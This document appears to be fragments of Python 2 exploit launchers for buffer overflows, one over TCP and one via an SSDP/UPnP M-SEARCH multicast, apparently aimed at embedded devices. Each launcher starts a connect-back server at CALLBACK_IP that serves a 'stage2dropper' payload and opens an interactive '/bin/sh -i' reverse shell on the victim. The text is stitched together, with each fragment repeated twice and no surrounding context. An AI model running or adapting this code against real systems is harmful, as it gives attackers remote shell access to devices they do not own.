if search_value.startswith("0x"):
value=int(search_value,16)
offset=buf.find_offset(value)
if(offset < 0):
print "Couldn't find value %s in the overflow buffer." % search_value
else:
print "Found value %s at\noffset: %d" % (search_value,offset)
exit(0)
addr=sys.argv[1]
port=int(sys.argv[2])
pid=1
files_to_serve=["./stage2dropper","./helloworld"]
server=TrojanServer(CALLBACK_IP,files_to_serve,connectback_shell=True,startcmd="/bin/sh -i")
pid=server.serve()
time.sleep(1)
if pid:
try:
sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((addr,port))
logger.LOG_INFO("sending exploit.")
sock.send(str(buf))
sock.close()
server.wait()
except Exception as e:
logger.LOG_WARN("Failed to connect. ")
logger.LOG_WARN("Failed to connect. Killing connect-back server.")
server.shutdown()
if search_value.startswith("0x"):
value=int(search_value,16)
offset=buf.find_offset(value)
if(offset < 0):
print "Couldn't find value %s in the overflow buffer." % search_value
else:
print "Found value %s at\noffset: %d" % (search_value,offset)
exit(0)
addr=sys.argv[1]
port=int(sys.argv[2])
pid=1
files_to_serve=["./stage2dropper","./helloworld"]
server=TrojanServer(CALLBACK_IP,files_to_serve,connectback_shell=True,startcmd="/bin/sh -i")
pid=server.serve()
time.sleep(1)
if pid:
try:
sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((addr,port))
logger.LOG_INFO("sending exploit.")
sock.send(str(buf))
sock.close()
server.wait()
except Exception as e:
logger.LOG_WARN("Failed to connect. ")
logger.LOG_WARN("Failed to connect. Killing connect-back server.")
server.shutdown()
msearch_string = msearch_crash.MsearchCrash(buffer_overflow_string)
pid = None
if len(sys.argv) > 1:
search_string = sys.argv[1]
if "0x" == search_string[0:2]:
search_string_num = int(search_string, 0)
search_string = struct.pack(">L", search_string_num)
offset = buffer_overflow_string.find_offset(search_string)
if offset < 0:
print "Couldn't find string %s in the overflow buffer." % search_string
else:
print "Found string %s at\noffset: %d" % (search_string, offset)
else:
pid = connectback_server.serve()
# sys.stdout.write(str(msearch_string))
if pid:
try:
logger.LOG_INFO("Sending exploit")
send_multicast("239.255.255.250", 1900, str(msearch_string))
connectback_server.wait()
except Exception as e:
print e
connectback_server.shutdown()
else:
logger.LOG_WARN("Failed to start connect-backserver.")
sys.exit(1)
msearch_string = msearch_crash.MsearchCrash(buffer_overflow_string)
pid = None
if len(sys.argv) > 1:
search_string = sys.argv[1]
if "0x" == search_string[0:2]:
search_string_num = int(search_string, 0)
search_string = struct.pack(">L", search_string_num)
offset = buffer_overflow_string.find_offset(search_string)
if (offset < 0):
print "Couldn't find string %s in the overflow buffer." % search_string
else:
print "Found string %s at\noffset: %d" % (search_string, offset)
else:
pid = connectback_server.serve()
#sys.stdout.write(str(msearch_string))
if pid:
try:
logger.LOG_INFO("Sending exploit")
send_multicast("239.255.255.250", 1900, str(msearch_string))
connectback_server.wait()
except Exception as e:
print e
connectback_server.shutdown()
else:
logger.LOG_WARN("Failed to start connect-backserver.")
sys.exit(1)
